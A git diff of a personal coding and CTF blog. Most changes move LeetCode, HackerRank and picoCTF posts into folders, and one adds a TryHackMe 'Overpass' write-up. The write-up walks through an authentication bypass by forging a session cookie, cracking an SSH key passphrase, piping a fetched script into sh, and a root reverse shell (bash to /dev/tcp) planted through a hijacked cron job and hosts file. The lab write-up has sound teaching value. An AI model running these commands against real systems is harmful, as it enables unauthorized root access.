diff --git a/content/en/posts/BinarySearch.md b/content/en/posts/BinarySearch.md index e347ff7..0490451 100755 --- a/content/en/posts/BinarySearch.md +++ b/content/en/posts/BinarySearch.md @@ -139,4 +139,4 @@ mid = (left + right) // 2 # Floor Division mid = (left + right) / 2 # Division ``` -There are 2 posts on this searching algorithms on this site here: [Leetcode Binary Search]({{< ref "posts/Leetcode-BinarySearch704.md" >}}) and [Leetcode First Bad Version 278]( {{< ref "posts/Leetcode-FirstBadVersion278.md" >}} ) +There are 2 posts on this searching algorithms on this site here: [Leetcode Binary Search]({{< ref "posts/leetcode/Leetcode-BinarySearch704.md" >}}) and [Leetcode First Bad Version 278]( {{< ref "posts/leetcode/Leetcode-FirstBadVersion278.md" >}} ) diff --git a/content/en/posts/TryHackMe/2023-12-23-Overpass.md b/content/en/posts/TryHackMe/2023-12-23-Overpass.md new file mode 100755 index 0000000..eeb7c78 --- /dev/null +++ b/content/en/posts/TryHackMe/2023-12-23-Overpass.md @@ -0,0 +1,186 @@ +--- +layout: post +title: TryHackMe - Overpass +date: '2023-12-23 10:29:32 +0800' +categories: [CTF, TryHackMe] +tags: [ctf,tryhackme] +math: true +libraries: + - mathjax +math: true +description: Overpass Room in TryHackMe +--- + +# Description + +What happens when a group of broke Computer Science students try to make a password manager? + +Obviously a perfect commercial success! + +# Enumeration + +### Nmap Scan + +```bash +nmap -p- -T5 $IP +``` + +```text +Nmap scan report for 10.10.88.227 +Host is up (0.19s latency). +Not shown: 64807 closed tcp ports (conn-refused), 726 filtered tcp ports (no-response) +PORT STATE SERVICE +22/tcp open ssh +80/tcp open http +``` + +### Dirbuster Scan + +{{< img src="/images/Overpass/Dirbuster.png" title="Dirbuster Scan" caption="Administrator Page found!" alt="" width="700px" position="center" >}} + +Looks like there is a route to `http://10.10.88.227/admin.html`. + +Inspecting the sources (`login.js`), we can see the vulnerable code block: + +{{< img src="/images/Overpass/Vulnerable_code.png" title="Vulnerable Code Block" caption="Look at the `else` block" alt="" width="700px" position="center" >}} + +The `if-else` blocks only checks for "Incorrect Credentials" in the POST response, we could probably modify the response via Burpsuite to force a creation of a `SessionToken` cookie (or manually create 1 ourselves). + +# Burpsuite Intercept + +{{< img src="/images/Overpass/Burpsuite_Req.png" title="Burpsuite" caption="Modify Burpsuite Response" alt="" width="700px" position="center" >}} + +Intercepting the traffic, we can get the `Response to this request` in the ui: + +{{< img src="/images/Overpass/Burpsuite_mod_response.png" title="Burpsuite" caption="Response to this request" alt="" width="700px" position="center" >}} + +Forwarding the traffic, we can see the modified response + +{{< img src="/images/Overpass/Burpsuite_mod_response_recv.png" title="Burpsuite" caption="Modified Request" alt="" width="700px" position="center" >}} + +We can then try to refresh the page in Burpsuite's Browser and find that we are logged in! + +{{< img src="/images/Overpass/Overpass_Login_landing.png" title="Overpass" caption="Successful Login!" alt="" width="700px" position="center" >}} + +We can see that a `SessionToken` cookie is created in the browser +{{< img src="/images/Overpass/Mod_session_cookie.png" title="Burpsuite" caption="Modified Session Key" alt="" width="700px" position="center" >}} + +Looks like an SSH RSA Private Key. We might be able to use this to access the server? + +# SSH + +Trying this: +```bash +ssh -i james@$IP +``` + +I get the following response: + +{{< img src="/images/Overpass/failed_ssh.png" title="SSH" caption="SSH Requires a passphrase" alt="" width="700px" position="center" >}} + +## Cracking the SSH key passphrase + +I first used `ssh2john` to convert it to a key hash: +```bash +ssh2john james.key > james.key.hash +``` + +Removing the `rsa.key:` from the hash, and using hashcat to identify the id of the hash to crack: + +{{< img src="/images/Overpass/key_to_hash.png" title="SSH" caption="Hash Generation and Identification" alt="" width="700px" position="center" >}} + +I then use `hashcat` to crack the hash with the `rockyou` wordlist: + +```bash +hashcat -m 22931 james.key.hash /usr/share/wordlists/rockyou.txt +``` + +{{< img src="/images/Overpass/cracked_key.png" title="SSH" caption="Cracked Key!" alt="" width="700px" position="center" >}} + +Passphrase: `james13` + +## Login attempt +Using the same command, I tried to SSH into the machine with the key and passphrase: + +{{< img src="/images/Overpass/successful_ssh.png" title="SSH" caption="Successful Login with the passphrase!" alt="" width="700px" position="center" >}} + +We got the user flag: + +```text +thm{65c1aaf000506e56996822c6281e6bf7} +``` + +# Privilege Escalation + +Using Linpeas, we can find possible routes to privilige escalation. Following [this tutorial](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS#quick-start), I started a webserver in the host machine and curl-ed the script in the victim machine: + +```bash +curl $HOST-IP/linpeas.sh | sh +``` + +### Crontab + +{{< img src="/images/Overpass/linpeas_crontab.png" title="Linpeas" caption="Crontab" alt="" width="700px" position="center" >}} + +Looks like the final line in the crontab runs as `root`, getting a bash script from a particular server and executing it + +### Hosts File + +{{< img src="/images/Overpass/linpeas_host_file.png" title="Linpeas" caption="Host File" alt="" width="700px" position="center" >}} + +The hosts file seems to be writable by everyone. Looks like I could modify the `overpass.thm` in the hosts file to do a callback to the host machine to run a malicious callback script. + +## Escalation Process + +We first created the necessary directories and `buildscript.sh` file: + +```bash +mkdir downloads +mkdir downloads/src +vim downloads/src/buildscript.sh +# Create the file with this as content: +# bash -i >& /dev/tcp/HOST-IP/5555 0>&1 +# bash -i >& /dev/tcp/10.17.101.177/5555 0>&1 + +# Just in case (Probably don't have to do this) +chmod +x downloads/src/buildscript.sh +``` + +and also started 2 servers: +```bash +# Start the netcat listener +nc -lvnup 5555 + +# Python Http Server +# sudo python3 -m http.server 80 + +# Python2 Http Server +python2 -m SimpleHTTPServer 80 +``` +It doesn't seem like the Python3 server works, so I used python2 with `SimpleHTTPServer` instead.. (More info later) + +The script used was a `bash reverse shell`, folloing the tutorial [here](https://ioflood.com/blog/bash-reverse-shell/), I created the file with this as the content: + +```text +#!/bin/bash + +bash -i >& /dev/tcp/10.17.101.177/5555 0>&1 +``` + +In the Victim Machine, I modified the hosts file +```text +10.17.101.177 overpass.thm +``` + +{{< img src="/images/Overpass/modified_hosts.png" title="Hosts File" caption="Modifed Hosts file in victim machine" alt="" width="700px" position="center" >}} + +And then we wait.. The script will be executed after the request from crontab. + +{{< img src="/images/Overpass/python_web_server.png" title="Python Web Server" caption="Python3 doesn't seem to work" alt="" width="700px" position="center" >}} + +After a few seconds, we get a reverse shell running as root! We can get the root flag from the current directory: + +{{< img src="/images/Overpass/root_flag.png" title="Root" caption="Root Flag!" alt="" width="700px" position="center" >}} + +We can see that we are root, the `root.txt` flag is in the directory and we can get the root flag! + diff --git a/content/en/posts/2022-11-13-SumOf5DigitNo.md b/content/en/posts/hackerrank/2022-11-13-SumOf5DigitNo.md similarity index 100% rename from content/en/posts/2022-11-13-SumOf5DigitNo.md rename to content/en/posts/hackerrank/2022-11-13-SumOf5DigitNo.md diff --git a/content/en/posts/2022-11-19-hackerrank-printing-tokens.md b/content/en/posts/hackerrank/2022-11-19-hackerrank-printing-tokens.md similarity index 100% rename from content/en/posts/2022-11-19-hackerrank-printing-tokens.md rename to content/en/posts/hackerrank/2022-11-19-hackerrank-printing-tokens.md diff --git a/content/en/posts/2022-11-19-hackerrank-sherlock-and-divisors.md b/content/en/posts/hackerrank/2022-11-19-hackerrank-sherlock-and-divisors.md similarity index 100% rename from content/en/posts/2022-11-19-hackerrank-sherlock-and-divisors.md rename to content/en/posts/hackerrank/2022-11-19-hackerrank-sherlock-and-divisors.md diff --git a/content/en/posts/2022-11-20-hackerrank-handshake.md b/content/en/posts/hackerrank/2022-11-20-hackerrank-handshake.md similarity index 100% rename from content/en/posts/2022-11-20-hackerrank-handshake.md rename to content/en/posts/hackerrank/2022-11-20-hackerrank-handshake.md diff --git a/content/en/posts/2022-11-20-hackerrank-project-euler-1-multiples-of-3-and-5.md b/content/en/posts/hackerrank/2022-11-20-hackerrank-project-euler-1-multiples-of-3-and-5.md similarity index 100% rename from content/en/posts/2022-11-20-hackerrank-project-euler-1-multiples-of-3-and-5.md rename to content/en/posts/hackerrank/2022-11-20-hackerrank-project-euler-1-multiples-of-3-and-5.md diff --git a/content/en/posts/2022-11-21-hackerrank-minimum-height-triangle.md b/content/en/posts/hackerrank/2022-11-21-hackerrank-minimum-height-triangle.md similarity index 100% rename from content/en/posts/2022-11-21-hackerrank-minimum-height-triangle.md rename to content/en/posts/hackerrank/2022-11-21-hackerrank-minimum-height-triangle.md diff --git a/content/en/posts/2022-11-18-leetcode-convert-the-temperature.md b/content/en/posts/leetcode/2022-11-18-leetcode-convert-the-temperature.md similarity index 100% rename from content/en/posts/2022-11-18-leetcode-convert-the-temperature.md rename to content/en/posts/leetcode/2022-11-18-leetcode-convert-the-temperature.md diff --git a/content/en/posts/2022-11-18-leetcode-ugly-number-263.md b/content/en/posts/leetcode/2022-11-18-leetcode-ugly-number-263.md similarity index 100% rename from content/en/posts/2022-11-18-leetcode-ugly-number-263.md rename to content/en/posts/leetcode/2022-11-18-leetcode-ugly-number-263.md diff --git a/content/en/posts/2022-11-19-leetcode-concatenation-of-array-1929.md b/content/en/posts/leetcode/2022-11-19-leetcode-concatenation-of-array-1929.md similarity index 100% rename from content/en/posts/2022-11-19-leetcode-concatenation-of-array-1929.md rename to content/en/posts/leetcode/2022-11-19-leetcode-concatenation-of-array-1929.md diff --git a/content/en/posts/2022-11-19-leetcode-two-sums-1.md b/content/en/posts/leetcode/2022-11-19-leetcode-two-sums-1.md similarity index 100% rename from content/en/posts/2022-11-19-leetcode-two-sums-1.md rename to content/en/posts/leetcode/2022-11-19-leetcode-two-sums-1.md diff --git a/content/en/posts/Leetcode-BinarySearch704.md b/content/en/posts/leetcode/Leetcode-BinarySearch704.md similarity index 100% rename from content/en/posts/Leetcode-BinarySearch704.md rename to content/en/posts/leetcode/Leetcode-BinarySearch704.md diff --git a/content/en/posts/Leetcode-FirstBadVersion278.md b/content/en/posts/leetcode/Leetcode-FirstBadVersion278.md similarity index 87% rename from content/en/posts/Leetcode-FirstBadVersion278.md rename to content/en/posts/leetcode/Leetcode-FirstBadVersion278.md index f664154..f3c5c19 100755 --- a/content/en/posts/Leetcode-FirstBadVersion278.md +++ b/content/en/posts/leetcode/Leetcode-FirstBadVersion278.md @@ -59,7 +59,7 @@ Explanation: 2 does not exist in nums so return -1 # Process -Using a binary search done in [Leetcode Binary Search 704]( {{< ref "posts/Leetcode-BinarySearch704.md" >}}), I was able to get the first bad version. +Using a binary search done in [Leetcode Binary Search 704]( {{< ref "posts/leetcode/Leetcode-BinarySearch704.md" >}}), I was able to get the first bad version. First, I initialised my `left` variable to `1` as the lower limit was `1` and I couldn't start from 0. I initialised right to be `n` for the number of versions. @@ -95,4 +95,4 @@ class Solution: # Afterthoughts -This is almost a duplicate of [Leetcode Binary Search 704]( {{< ref "posts/Leetcode-BinarySearch704.md" >}}), where binary search is used as the most efficient algorithm, splitting the sorted array into half each time through the iteration to search for the values required. I need more practice to be familiar and comfortable with these searching algorithms. +This is almost a duplicate of [Leetcode Binary Search 704]( {{< ref "posts/leetcode/Leetcode-BinarySearch704.md" >}}), where binary search is used as the most efficient algorithm, splitting the sorted array into half each time through the iteration to search for the values required. I need more practice to be familiar and comfortable with these searching algorithms. diff --git a/content/en/posts/leetcode-DefangIP.md b/content/en/posts/leetcode/leetcode-DefangIP.md similarity index 100% rename from content/en/posts/leetcode-DefangIP.md rename to content/en/posts/leetcode/leetcode-DefangIP.md diff --git a/content/en/posts/2022-10-12-picoctf-mod-26.md b/content/en/posts/picoctf/2022-10-12-picoctf-mod-26.md similarity index 100% rename from content/en/posts/2022-10-12-picoctf-mod-26.md rename to content/en/posts/picoctf/2022-10-12-picoctf-mod-26.md diff --git a/content/en/posts/2022-10-12-picoctf-obedient-cat.md b/content/en/posts/picoctf/2022-10-12-picoctf-obedient-cat.md similarity index 100% rename from content/en/posts/2022-10-12-picoctf-obedient-cat.md rename to content/en/posts/picoctf/2022-10-12-picoctf-obedient-cat.md diff --git a/content/en/posts/2022-11-18-picoctf-wave-a-flag.md b/content/en/posts/picoctf/2022-11-18-picoctf-wave-a-flag.md similarity index 100% rename from content/en/posts/2022-11-18-picoctf-wave-a-flag.md rename to content/en/posts/picoctf/2022-11-18-picoctf-wave-a-flag.md diff --git a/static/images/Overpass/Burpsuite_Req.png b/static/images/Overpass/Burpsuite_Req.png new file mode 100644 index 0000000..b6be9c7 Binary files /dev/null and b/static/images/Overpass/Burpsuite_Req.png differ diff --git a/static/images/Overpass/Burpsuite_mod_response.png b/static/images/Overpass/Burpsuite_mod_response.png new file mode 100644 index 0000000..4e5a84a Binary files /dev/null and b/static/images/Overpass/Burpsuite_mod_response.png differ diff --git a/static/images/Overpass/Burpsuite_mod_response_recv.png b/static/images/Overpass/Burpsuite_mod_response_recv.png new file mode 100644 index 0000000..116fd3a Binary files /dev/null and b/static/images/Overpass/Burpsuite_mod_response_recv.png differ diff --git a/static/images/Overpass/Dirbuster.png b/static/images/Overpass/Dirbuster.png new file mode 100644 index 0000000..b8708e9 Binary files /dev/null and b/static/images/Overpass/Dirbuster.png differ diff --git a/static/images/Overpass/Mod_session_cookie.png b/static/images/Overpass/Mod_session_cookie.png new file mode 100644 index 0000000..10dc974 Binary files /dev/null and b/static/images/Overpass/Mod_session_cookie.png differ diff --git a/static/images/Overpass/Overpass_Login_landing.png b/static/images/Overpass/Overpass_Login_landing.png new file mode 100644 index 0000000..e10610e Binary files /dev/null and b/static/images/Overpass/Overpass_Login_landing.png differ diff --git a/static/images/Overpass/Vulnerable_code.png b/static/images/Overpass/Vulnerable_code.png new file mode 100644 index 0000000..aa1e87a Binary files /dev/null and b/static/images/Overpass/Vulnerable_code.png differ diff --git a/static/images/Overpass/cracked_key.png b/static/images/Overpass/cracked_key.png new file mode 100644 index 0000000..6cb1e8c Binary files /dev/null and b/static/images/Overpass/cracked_key.png differ diff --git a/static/images/Overpass/failed_ssh.png b/static/images/Overpass/failed_ssh.png new file mode 100644 index 0000000..5784e82 Binary files /dev/null and b/static/images/Overpass/failed_ssh.png differ diff --git a/static/images/Overpass/key_to_hash.png b/static/images/Overpass/key_to_hash.png new file mode 100644 index 0000000..c786884 Binary files /dev/null and b/static/images/Overpass/key_to_hash.png differ diff --git a/static/images/Overpass/linpeas_crontab.png b/static/images/Overpass/linpeas_crontab.png new file mode 100644 index 0000000..7c670fc Binary files /dev/null and b/static/images/Overpass/linpeas_crontab.png differ diff --git a/static/images/Overpass/linpeas_host_file.png b/static/images/Overpass/linpeas_host_file.png new file mode 100644 index 0000000..697f3c6 Binary files /dev/null and b/static/images/Overpass/linpeas_host_file.png differ diff --git a/static/images/Overpass/modified_hosts.png b/static/images/Overpass/modified_hosts.png new file mode 100644 index 0000000..66f3bf6 Binary files /dev/null and b/static/images/Overpass/modified_hosts.png differ diff --git a/static/images/Overpass/python_web_server.png b/static/images/Overpass/python_web_server.png new file mode 100644 index 0000000..302dcc0 Binary files /dev/null and b/static/images/Overpass/python_web_server.png differ diff --git a/static/images/Overpass/root_flag.png b/static/images/Overpass/root_flag.png new file mode 100644 index 0000000..30410b9 Binary files /dev/null and b/static/images/Overpass/root_flag.png differ diff --git a/static/images/Overpass/successful_ssh.png b/static/images/Overpass/successful_ssh.png new file mode 100644 index 0000000..4b4417b Binary files /dev/null and b/static/images/Overpass/successful_ssh.png differ